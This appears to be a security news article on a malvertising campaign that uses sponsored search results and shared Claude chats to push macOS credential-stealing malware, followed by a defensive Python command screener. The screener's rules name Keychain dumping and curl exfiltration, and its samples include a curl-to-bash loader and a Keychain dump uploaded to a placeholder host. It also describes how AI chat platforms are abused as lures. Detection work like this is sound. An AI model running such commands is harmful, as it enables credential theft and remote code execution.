Malvertising is a tactic in which attackers buy Google Ads to lure users to malicious content; in this campaign they also abused features of legitimate AI platforms to distribute malware. The target is macOS users searching for a Claude Mac download. The sponsored results lead to shared Claude chats that masquerade as official installation guides and quietly deliver the malware. What makes this particularly insidious is that the lure lives on a legitimate AI platform, which makes it harder for users to recognise the malicious intent.
The malware, once executed, collects sensitive data such as browser credentials, cookies, and macOS Keychain contents. It then exfiltrates this information to the attacker's server, indicating a targeted and sophisticated attack. The attackers seem to be selective in their targeting, profiling victims before delivering the payload. This profiling includes checking for Russian or CIS-region keyboard input sources and gathering victim details like IP address, hostname, OS version, and keyboard locale.
What's more concerning is the attackers' ability to abuse AI platform shared chats. In December, a similar campaign targeted ChatGPT and Grok users, showcasing the growing trend of leveraging AI platforms for malicious purposes. This highlights the need for users to be vigilant and cautious when interacting with sponsored search results or shared chats, especially when they involve terminal commands.
The legitimate Claude Code CLI is available through official channels, and users should avoid clicking on sponsored search results for downloads. Terminal commands copied from a chat interface should be treated with caution: a pasted command runs with the user's full privileges, and the content of a shared chat is whatever its author chose to put there. As AI continues to evolve, so do the tactics of malicious actors, making it crucial for users and security professionals to stay informed and proactive in their defense against such threats.
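As an added example (not from the original article or from any vendor tooling), the following screener applies the advice above: it inspects a command copied from a chat or "installation guide" before it is run and flags the behaviours the article attributes to the malware (Keychain and browser-credential access, upload of collected data) together with common loader patterns. The rules and sample commands are constructed for illustration and are not indicators from this campaign.

```python
import re
from typing import NamedTuple

class Finding(NamedTuple):
    rule: str
    evidence: str

# Constructed, generic heuristics; NOT indicators from the campaign above.
# They cover Keychain/browser-credential access, upload of collected data,
# and the "fetch or decode, then pipe into a shell" loader pattern.
RULES = [
    ("remote-fetch-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("decoded-payload-executed",
     re.compile(r"base64\s+(-d|--decode|-D)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b|\beval\b")),
    ("keychain-access",
     re.compile(r"\bsecurity\s+(find-(generic|internet)-password|dump-keychain)\b")),
    ("browser-credential-store",
     re.compile(r"Library/Application Support/(Google/Chrome|BraveSoftware|Firefox)|\b(Login Data|Cookies)\b")),
    ("data-exfil-upload",
     re.compile(r"\bcurl\b[^;|]*\s(-d|--data(-binary|-raw)?|-F|-T)\s")),
]

def screen_command(command):
    # Return every rule the command trips, with the text that matched.
    findings = []
    for name, pattern in RULES:
        match = pattern.search(command)
        if match:
            findings.append(Finding(name, match.group(0)))
    return findings

def risk_level(findings):
    # Credential access combined with an upload is the worst case;
    # a remote or decoded payload piped into a shell is next.
    names = {f.rule for f in findings}
    if names & {"keychain-access", "browser-credential-store"} and "data-exfil-upload" in names:
        return "critical"
    if names & {"remote-fetch-piped-to-shell", "decoded-payload-executed"}:
        return "high"
    return "medium" if names else "low"

# Constructed sample commands; example.invalid is a reserved placeholder domain.
SAMPLE_COMMANDS = {
    "benign": "brew update && brew upgrade",
    "loader": "curl -fsSL https://example.invalid/install.sh | bash",
    "stealer": ("security dump-keychain -d login.keychain > /tmp/k; "
                "curl --data-binary @/tmp/k https://example.invalid/upload"),
}

if __name__ == "__main__":
    for label, cmd in SAMPLE_COMMANDS.items():
        print(label, risk_level(screen_command(cmd)), [f.rule for f in screen_command(cmd)])
```

A real deployment would wrap this in a shell pre-exec hook or clipboard watcher; the rule list is a starting point to tune, not a complete signature set.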